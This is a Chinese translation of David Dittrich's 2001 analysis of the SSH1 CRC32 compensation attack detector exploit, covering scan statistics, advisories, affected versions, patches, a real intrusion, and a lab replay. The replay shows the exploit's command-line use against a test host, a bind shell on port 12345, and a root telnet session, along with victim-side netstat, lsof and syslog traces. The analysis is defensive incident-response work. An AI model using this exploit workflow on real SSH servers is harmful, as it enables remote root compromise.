| 導購 | 订阅 | 在线投稿
分享
 
 
 

對于SSH crc32 compensation attack detector exploit 的分析

來源:互聯網  2008-06-01 01:10:16  評論

由于SSH crc32 compensation attack detector eXPloit代碼的流傳開來,對于

SSH的掃描也越來越多,這是一份統計報表:

+------------+------------+----------+----------+-----------+

| date | #Probes| #Sources | #Targets | #Scanners |

+------------+------------+----------+----------+-----------+

| 2001-10-03 | 1466 |45|987 | |

| 2001-10-04 |319 |25|212 | |

| 2001-10-05 |825 |22|783 | |

| 2001-10-06 |86552 |27|86305 | |

| 2001-10-07 | 7564 |29| 7429 | |

| 2001-10-08 | 2506 |29| 2449 | |

| 2001-10-09 | 1010 |18|263 | |

| 2001-10-10 |480 |39|307 | |

| 2001-10-11 |978 |31|504 | |

| 2001-10-12 |436 |21|311 | |

| 2001-10-13 | 6731 |27| 6353 | |

| 2001-10-14 | 1411 |29| 1084 | |

| 2001-10-15 |936 |34|723 | |

| 2001-10-16 | 1358 |40| 1256 | |

| 2001-10-17 | 1098 |36|899 | |

| 2001-10-18 | 1779 |31| 1438 | |

| 2001-10-19 |19722 |28|19573 | 7 |

| 2001-10-20 |25539 |21|25419 | 3 |

| 2001-10-21 | 6796 |26| 6750 | 9 |

| 2001-10-22 |807 |30|482 | 5 |

| 2001-10-23 |578 |49|327 | 6 |

| 2001-10-24 | 2198 |39| 2025 | 9 |

| 2001-10-25 | 2368 |31| 1759 | 6 |

| 2001-10-26 |712 |37|591 | 7 |

| 2001-10-27 |463 |30|297 | 8 |

| 2001-10-28 |495 |30|263 | 5 |

| 2001-10-29 |478 |37|399 | 5 |

| 2001-10-30 | 1154 |48| 1051 | 5 |

| 2001-10-31 | 1998 |46| 1047 | 5 |

| 2001-11-01 |66660 |46|66386 | 5 |

| 2001-11-02 | 1514 |40|926 | 5 |

| 2001-11-03 | 2142 |36| 2047 | 8 |

| 2001-11-04 | 1233 |26|781 | 9 |

+------------+------------+----------+----------+-----------+

鑒于此情況,編譯整理David A. Dittrich <dittrich@cac.washington.edu> 文章(http://staff.washington.edu/dittrich/misc/ssh-analysis.txt)供大家參考和修補。

-------------------------------------------------------------------------------

概述

==================

此漏洞最開始由CORE-SDI組織在securityfocus.com上的BUGTRAQ上發布了他們安全

公告CORE-20010207,日期爲2001,2月8號:

http://www.securityfocus.com/advisories/3088

漏洞的簡單描述就是:ssh1守護程序中所帶的一段代碼中存在一個整數溢出問題。問題出在

deattack.c,此程序由CORE SDI開發,用來防止SSH1協議受到CRC32補償攻擊。

由于在detect_attack()函數中錯誤的將一個16位的無符號變量當成了32位變量來使用,導致表索引溢出問題。

這將答應一個攻擊者覆蓋內存中的任意位置的內容,攻擊者可能遠程獲取root權限。

其他組織也陸續公布了一些對這個SSH 漏洞的分析和建議如:

 http://xforce.iss.net/alerts/advise100.PHP

 http://razor.bindview.com/publish/advisories/adv_ssh1crc.Html

 http://www.securityfocus.com/bugid=2347

而在2001年10月21號Jay Dyson在incidents@securityfocus.com郵件列表上聲明

有不少信息顯示有人在掃描RIPE 網絡段的SSH服務器:

 http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&end=2001-11-02&mid=221998&threads=1

然後更甚的是在vuln-dev@securityfocus.com郵件列表中提示Newsbytes.com中

有新聞描述有人願付$1000美金的人提供此攻擊工具。還有沒有確認的傳聞針對

Solaris 8/SPARC SSH.com 1.2.26-31 系統的攻擊代碼也存在。聞名的安全站點

securitynewsportal.com就被這個漏洞攻擊,下面地址是被黑截圖:

 http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/

最近TESO發布了關于這些攻擊代碼的信息,你可以在下面的地址查看:

 http://www.team-teso.org/sshd_statement.php

下面是受影響的SSH版本:

SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 fallback is enabled)

SSH Communications Security SSH 1.2.23-1.2.31

F-Secure SSH versions prior to 1.3.11-2

OpenSSH versions prior to 2.3.0 (if SSH Version 1 fallback is enabled)

OSSH 1.5.7

不過供給商已經爲系統提供補丁信息,大家可以參考如下地址:

 http://www.ssh.com/prodUCts/ssh/advisories/ssh1_crc-32.cfm

 http://openssh.org/security.html

 http://www.cisco.com/warp/public/707/SSH-multiple-pub.html

---------------------------------------------------------------------------

攻擊行爲的分析

=====================

2001年10月6日,攻擊者從Netherlands網絡段使用crc32 compensation attack

detector漏洞攻擊程序入侵了一台UW網絡中使用了OpenSSH 2.1.1的Redhat Linux

系統,漏洞描述如CERT VU#945216所述:

 http://www.kb.cert.org/vuls/id/945216

系統中一系列操作系統命令被替換成木馬程序以提供以後再次進入並清除了所有

日志系統。第二台SSH服務器運行在39999/tcp高端口,系統入侵後被用來掃描其他

UW以外的網絡以獲得更多的運行OpenSSH 2.1.1的系統。

通過一些恢複操作對這個漏洞程序進行了分析:

這個攻擊代碼基于OpenSSH 2.2.0版本(這個是2.1.1之後的版本,對crc32

compensation attack detection function進行了修補),不過針對OpenSSH

2.1.1進行攻擊,其攻擊代碼也可以使用在ssh.com 1.2.31版本(針對其他SSH

協議1 和版本的測試尚無完成)。

攻擊代碼對針對如下系統:

 linux/x86 ssh.com 1.2.26-1.2.31 rhl

 linux/x86 openssh 1.2.3 (maybe others)

 linux/x86 openssh 2.2.0p1 (maybe others)

 freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl

雖然這個攻擊代碼可以對多個平台系統進行攻擊,這裏攻擊者只掃描22/tcp端口,

然後連接這些系統獲得響應的版本程序並只對"OpenSSH_2.1.1"繼續進一步操作。

這些掃描使用快速SYN掃描,使用來自t0rn root kit中的工具。

對破壞的系統進行分析發現已經有47067個地址被掃描,而在這些地址中,有1244

個主機被鑒別存在此漏洞,攻擊者成功的在8月8日系統離線之前利用此漏洞進入

4個主機。

這個攻擊者代碼對使用訪問控制限制(如, SSH.com的"AllowHosts" 或者 "DenyHosts"

設置) 或者包過濾(如, ipchains, iptables, ipf) 的系統不能正常工作,因爲這些

會要求交換Public keys。

-------------------------------------------------------------------------

對攻擊者代碼實時的分析

============================

此攻擊代碼在隔離的網絡段進行測試,使用了網絡地址爲10.10.10.0/24,攻擊

主機使用了10.10.10.10 而有漏洞的服務主機爲 10.10.10.3。

有漏洞的服務主機系統運行了在Red Hat Linux6.0(Kernel 2.2.16-3 on an i586)

的SSH.com的 1.2.31 版本。

而攻擊主機運行了Fred Cohen's PLAC[1] (從CD-ROM引導的Linux 2.4.5 系統),

文件使用"nc"(Netcat)[2]拷貝到系統中.

攻擊一方再現

=========================

當以沒有任何參數運行攻擊代碼的時候會顯示使用信息:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

root@plac /bin >> ./ssh

linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from

openssh 2.2.0 src

greets: mray, random, big t, sh1fty, scut, dvorak

ps. this sploit already owned cia.gov :/

**please pick a type**

Usage: ./ssh host [options]

Options:

-p port

-b base Base address to start bruteforcing distance, by default 0x1800,

goes as high as 0x10000

-t type

-d debug mode

-o Add this to delta_min

types:

0: linux/x86 ssh.com 1.2.26-1.2.31 rhl

1: linux/x86 openssh 1.2.3 (maybe others)

2: linux/x86 openssh 2.2.0p1 (maybe others)

3: freebsd 4.x, ssh.com 1.2.26-1.2.31 rhl

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

被測試系統在系統端口2222上運行著SSH.com version 1.2.31 (未修補)程序,並

把syslog日志重定向獨立的文件sshdx.log.

這裏選擇了類型type 0和2222 攻擊端口:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

root@plac /bin >> ./ssh 10.10.10.3 -p 2222 -t 0

linux/x86 sshd1 exploit by zip/TESO (zip@james.kalifornia.com) - ripped from

openssh 2.2.0 src

greets: mray, random, big t, sh1fty, scut, dvorak

ps. this sploit already owned cia.gov :/

...........................

bruteforced distance: 0x3200

bruteforcing distance from h->partial packet buffer on stack

..............^[[A................|////////\\\\!

bruteforced h->ident buff distance: 5bfbed88

trying retloc_delta: 35

....!

found high Words of possible return address: 808

trying to exploit

....

trying retloc_delta: 37

.!

found high words of possible return address: 805

trying to exploit

....

trying retloc_delta: 39

......

trying retloc_delta: 3b

......

trying retloc_delta: 3d

!

found high words of possible return address: 804

trying to exploit

....

trying retloc_delta: 3f

......

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

這裏看來,攻擊攻擊相似被"停止"了,返回被攻擊系統查看卻發現被開了後門。

被測試系統一方再現

=======================

在利用漏洞之前,被測試系統顯示標准SSH守護程序運行在22/tcp端口,要被

測試的應用程序運行在2222/tcp端口,兩個都在監聽狀態,而且標准SSH守護

程序有一個外部連接(10.10.10.2:33354),通過netstat查看如下:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# netstat -an --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而在攻擊程序"停止"以後,再用netstat查看網絡監聽狀態如下:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# netstat -an --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

發現有新的服務在12345/tcp端口監聽。

返回攻擊者主機,使用netstat查看網絡狀態,發現程序使用了暴力猜測地址

方式攻擊:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# netstat -an --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN

tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED

tcp 0 0 10.10.10.3:2222 10.10.10.10:33075 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33074 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33072 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33071 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33069 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33067 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33066 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33064 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33063 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33062 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33061 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33060 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33059 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33058 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33056 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33055 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33053 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33051 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33050 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33047 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33046 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33042 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33041 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33038 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33036 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33034 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33033 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33032 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33030 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33029 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33028 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33027 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33024 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33023 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33022 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33021 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33020 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33016 TIME_WAIT

tcp 0 0 10.10.10.3:2222 10.10.10.10:33014 TIME_WAIT

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

而使用LiSt Open Files ("lsof")[4]工具顯示被測試的SSH守護程序開啓了一個

新的監聽端口:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# lsof -p 9364

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

sshd 9364 root cwd DIR 3,3 1024 2 /

sshd 9364 root rtd DIR 3,3 1024 2 /

sshd 9364 root txt REG 3,3 655038 442413 /usr/local/src/ssh-1.2.31/sbin/sshd1

sshd 9364 root mem REG 3,3 340771 30722 /lib/ld-2.1.3.so

sshd 9364 root mem REG 3,3 370141 31107 /lib/libnsl-2.1.3.so

sshd 9364 root mem REG 3,3 66231 31103 /lib/libcrypt-2.1.3.so

sshd 9364 root mem REG 3,3 47008 31113 /lib/libutil-2.1.3.so

sshd 9364 root mem REG 3,3 4101836 31102 /lib/libc-2.1.3.so

sshd 9364 root mem REG 3,3 246652 31109 /lib/libnss_files-2.1.3.so

sshd 9364 root mem REG 3,3 252234 31111 /lib/libnss_nisplus-2.1.3.so

sshd 9364 root mem REG 3,3 255963 31110 /lib/libnss_nis-2.1.3.so

sshd 9364 root mem REG 3,3 67580 31108 /lib/libnss_dns-2.1.3.so

sshd 9364 root mem REG 3,3 169720 31112 /lib/libresolv-2.1.3.so

sshd 9364 root 0u CHR 1,3 4110 /dev/null

sshd 9364 root 1u CHR 1,3 4110 /dev/null

sshd 9364 root 2u CHR 1,3 4110 /dev/null

sshd 9364 root 3u inet 10202 TCP *:12345 (LISTEN)

sshd 9364 root 4u inet 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (CLOSE_WAIT)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

很明顯,攻擊程序成功利用此漏洞獲得ROOT SHELL,並綁定了一個高端TCP端口。

這樣攻擊者可以使用任何"telnet"或者"rc"工具連接到此端口並以超級用戶的

方式執行任意命令,如下所示:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

root@plac ~ >> telnet 10.10.10.3 12345

Trying 10.10.10.3...

Connected to 10.10.10.3.

Escape character is '^]'.

id;

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

date;

Thu Nov 1 18:04:42 PST 2001

netstat -an --inet;

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 10.10.10.3:12345 10.10.10.10:33077 ESTABLISHED

tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN

tcp 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

exit;

Connection closed by foreign host.

root@plac ~ >>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[注重]:使用telnet要加";"號,而nc連接不需要。

等攻擊者退出以後,被測試系統網絡狀態返回正常:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[root@victim /root]# netstat -an --inet

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State

tcp 0 0 10.10.10.3:2222 0.0.0.0:* LISTEN

tcp 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN

raw 0 0 0.0.0.0:1 0.0.0.0:* 7

raw 0 0 0.0.0.0:6 0.0.0.0:* 7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

假如syslog日志功能開啓了,連接和暴力測試的信息全部會記錄下來(注重,這個是

對SSH.com 1.2.31在Red Hat LInux 6.0上的測試 -- 日志標志會和記錄OpenSSH

不一樣):

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Nov 1 18:46:14 victim sshd[9510]: log: Connection from 10.10.10.10 port 33298

Nov 1 18:46:19 victim sshd[9511]: log: Connection from 10.10.10.10 port 33299

Nov 1 18:46:22 victim sshd[9512]: log: Connection from 10.10.10.10 port 33300

Nov 1 18:46:26 victim sshd[9513]: log: Connection from 10.10.10.10 port 33301

Nov 1 18:46:31 victim sshd[9515]: log: Connection from 10.10.10.10 port 33302

Nov 1 18:46:35 victim sshd[9516]: log: Connection from 10.10.10.10 port 33303

Nov 1 18:46:39 victim sshd[9517]: log: Connection from 10.10.10.10 port 33304

Nov 1 18:46:43 victim sshd[9518]: log: Connection from 10.10.10.10 port 33305

Nov 1 18:46:47 victim sshd[9518]: fatal: Local: Corrupted check bytes on input.

Nov 1 18:46:47 victim sshd[9519]: log: Connection from 10.10.10.10 port 33306

Nov 1 18:46:52 victim sshd[9519]: fatal: Connection closed by remote host.

Nov 1 18:46:53 victim sshd[9520]: log: Connection from 10.10.10.10 port 33307

Nov 1 18:46:57 victim sshd[9521]: log: Connection from 10.10.10.10 port 33308

Nov 1 18:47:01 victim sshd[9522]: log: Connection from 10.10.10.10 port 33309

Nov 1 18:47:06 victim sshd[9523]: log: Connection from 10.10.10.10 port 33310

Nov 1 18:47:10 victim sshd[9524]: log: Connection from 10.10.10.10 port 33311

Nov 1 18:47:14 victim sshd[9525]: log: Connection from 10.10.10.10 port 33312

Nov 1 18:47:19 victim sshd[9526]: log: Connection from 10.10.10.10 port 33313

Nov 1 18:47:24 victim sshd[9527]: log: Connection from 10.10.10.10 port 33314

Nov 1 18:47:24 victim sshd[9527]: fatal: Connection closed by remote host.

Nov 1 18:47:46 victim sshd[9528]: log: Connection from 10.10.10.10 port 33315

Nov 1 18:47:46 victim sshd[9529]: log: Connection from 10.10.10.10 port 33316

Nov 1 18:47:47 victim sshd[9530]: log: Connection from 10.10.10.10 port 33317

Nov 1 18:47:47 victim sshd[9531]: log: Connection from 10.10.10.10 port 33318

Nov 1 18:47:47 victim sshd[9532]: log: Connection from 10.10.10.10 port 33319

Nov 1 18:47:48 victim sshd[9533]: log: Connection from 10.10.10.10 port 33320

Nov 1 18:47:48 victim sshd[9534]: log: Connection from 10.10.10.10 port 33321

Nov 1 18:47:48 victim sshd[9535]: log: Connection from 10.10.10.10 port 33322

Nov 1 18:47:49 victim sshd[9536]: log: Connection from 10.10.10.10 port 33323

Nov 1 18:47:49 victim sshd[9537]: log: Connection from 10.10.10.10 port 33324

Nov 1 18:47:50 victim sshd[9538]: log: Connection from 10.10.10.10 port 33325

Nov 1 18:47:50 victim sshd[9539]: log: Connection from 10.10.10.10 port 33326

Nov 1 18:47:50 victim sshd[9540]: log: Connection from 10.10.10.10 port 33327

Nov 1 18:47:51 victim sshd[9541]: log: Connection from 10.10.10.10 port 33328

Nov 1 18:47:51 victim sshd[9542]: log: Connection from 10.10.10.10 port 33329

Nov 1 18:47:51 victim sshd[9543]: log: Connection from 10.10.10.10 port 33330

Nov 1 18:47:52 victim sshd[9544]: log: Connection from 10.10.10.10 port 33331

Nov 1 18:47:52 victim sshd[9545]: log: Connection from 10.10.10.10 port 33332

Nov 1 18:47:52 victim sshd[9546]: log: Connection from 10.10.10.10 port 33333

Nov 1 18:47:53 victim sshd[9547]: log: Connection from 10.10.10.10 port 33334

Nov 1 18:47:53 victim sshd[9548]: log: Connection from 10.10.10.10 port 33335

Nov 1 18:47:54 victim sshd[9549]: log: Connection from 10.10.10.10 port 33336

Nov 1 18:47:54 victim sshd[9550]: log: Connection from 10.10.10.10 port 33337

Nov 1 18:47:54 victim sshd[9551]: log: Connection from 10.10.10.10 port 33338

Nov 1 18:47:55 victim sshd[9552]: log: Connection from 10.10.10.10 port 33339

Nov 1 18:47:55 victim sshd[9553]: log: Connection from 10.10.10.10 port 33340

Nov 1 18:47:55 victim sshd[9554]: log: Connection from 10.10.10.10 port 33341

Nov 1 18:47:56 victim sshd[9555]: log: Connection from 10.10.10.10 port 33342

Nov 1 18:47:56 victim sshd[9556]: log: Connection from 10.10.10.10 port 33343

Nov 1 18:47:56 victim sshd[9555]: fatal: Local: Corrupted check bytes on input.

Nov 1 18:47:57 victim sshd[9557]: log: Connection from 10.10.10.10 port 33344

Nov 1 18:47:57 victim sshd[9558]: log: Connection from 10.10.10.10 port 33345

Nov 1 18:47:57 victim sshd[9559]: log: Connection from 10.10.10.10 port 33346

Nov 1 18:47:58 victim sshd[9560]: log: Connection from 10.10.10.10 port 33347

Nov 1 18:47:58 victim sshd[9561]: log: Connection from 10.10.10.10 port 33348

Nov 1 18:47:59 victim sshd[9562]: log: Connection from 10.10.10.10 port 33349

Nov 1 18:47:59 victim sshd[9563]: log: Connection from 10.10.10.10 port 33350

Nov 1 18:47:59 victim sshd[9564]: log: Connection from 10.10.10.10 port 33351

Nov 1 18:48:00 victim sshd[9565]: log: Connection from 10.10.10.10 port 33352

Nov 1 18:48:00 victim sshd[9566]: log: Connection from 10.10.10.10 port 33353

Nov 1 18:48:00 victim sshd[9567]: log: Connection from 10.10.10.10 port 33354

Nov 1 18:48:01 victim sshd[9568]: log: Connection from 10.10.10.10 port 33355

Nov 1 18:48:01 victim sshd[9569]: log: Connection from 10.10.10.10 port 33356

Nov 1 18:48:02 victim sshd[9570]: log: Connection from 10.10.10.10 port 33357

Nov 1 18:48:02 victim sshd[9571]: log: Connection from 10.10.10.10 port 33358

Nov 1 18:48:02 victim sshd[9572]: log: Connection from 10.10.10.10 port 33359

Nov 1 18:48:03 victim sshd[9573]: log: Connection from 10.10.10.10 port 33360

Nov 1 18:48:03 victim sshd[9574]: log: Connection from 10.10.10.10 port 33361

Nov 1 18:48:03 victim sshd[9575]: log: Connection from 10.10.10.10 port 33362

Nov 1 18:48:04 victim sshd[9576]: log: Connection from 10.10.10.10 port 33363

Nov 1 18:48:04 victim sshd[9577]: log: Connection from 10.10.10.10 port 33364

Nov 1 18:48:04 victim sshd[9578]: log: Connection from 10.10.10.10 port 33365

Nov 1 18:48:05 victim sshd[9579]: log: Connection from 10.10.10.10 port 33366

Nov 1 18:48:05 victim sshd[9580]: log: Connection from 10.10.10.10 port 33367

Nov 1 18:48:06 victim sshd[9581]: log: Connection from 10.10.10.10 port 33368

Nov 1 18:48:06 victim sshd[9582]: log: Connection from 10.10.10.10 port 33369

Nov 1 18:48:06 victim sshd[9583]: log: Connection from 10.10.10.10 port 33370

Nov 1 18:48:07 victim sshd[9584]: log: Connection from 10.10.10.10 port 33371

Nov 1 18:48:07 victim sshd[9585]: log: Connection from 10.10.10.10 port 33372

Nov 1 18:48:07 victim sshd[9586]: log: Connection from 10.10.10.10 port 33373

Nov 1 18:48:08 victim sshd[9587]: log: Connection from 10.10.10.10 port 33374

Nov 1 18:48:08 victim sshd[9586]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:08 victim sshd[9588]: log: Connection from 10.10.10.10 port 33375

Nov 1 18:48:08 victim sshd[9587]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:08 victim sshd[9589]: log: Connection from 10.10.10.10 port 33376

Nov 1 18:48:08 victim sshd[9588]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:09 victim sshd[9590]: log: Connection from 10.10.10.10 port 33377

Nov 1 18:48:09 victim sshd[9589]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:09 victim sshd[9591]: log: Connection from 10.10.10.10 port 33378

Nov 1 18:48:09 victim sshd[9590]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:09 victim sshd[9592]: log: Connection from 10.10.10.10 port 33379

Nov 1 18:48:09 victim sshd[9591]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:10 victim sshd[9592]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:10 victim sshd[9593]: log: Connection from 10.10.10.10 port 33380

Nov 1 18:48:10 victim sshd[9594]: log: Connection from 10.10.10.10 port 33381

Nov 1 18:48:10 victim sshd[9593]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:11 victim sshd[9595]: log: Connection from 10.10.10.10 port 33382

Nov 1 18:48:11 victim sshd[9594]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383

Nov 1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384

Nov 1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385

Nov 1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386

Nov 1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:12 victim sshd[9600]: log: Connection from 10.10.10.10 port 33387

Nov 1 18:48:12 victim sshd[9599]: fatal: Local: crc32 compensation attack: network attack detected

Nov 1 18:48:13 victim sshd[9601]: log: Connection from 10.10.10.10 port 33388

Nov 1 18:48:13 victim sshd[9602]: log: Connection from 10.10.10.10 port 33389

Nov 1 18:48:13 victim sshd[9603]: log: Connection from 10.10.10.10 port 33390

Nov 1 18:48:14 victim sshd[9604]: log: Connection from 10.10.10.10 port 33391

Nov 1 18:48:14 victim sshd[9605]: log: Connection from 10.10.10.10 port 33392

Nov 1 18:48:15 victim sshd[9606]: log: Connection from 10.10.10.10 port 33393

Nov 1 18:48:15 victim sshd[9605]: fatal: Local: Corrupted check bytes on input.

Nov 1 18:48:15 victim sshd[9607]: log: Connection from 10.10.10.10 port 33394

Nov 1 18:48:16 victim sshd[9608]: log: Connection from 10.10.10.10 port 33395

Nov 1 18:48:16 victim sshd[9609]: log: Connection from 10.10.10.10 port 33396

Nov 1 18:48:16 victim sshd[9610]: log: Connection from 10.10.10.10 port 33397

Nov 1 18:48:17 victim sshd[9611]: log: Connection from 10.10.10.10 port 33398

Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.

Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399

Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400

Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401

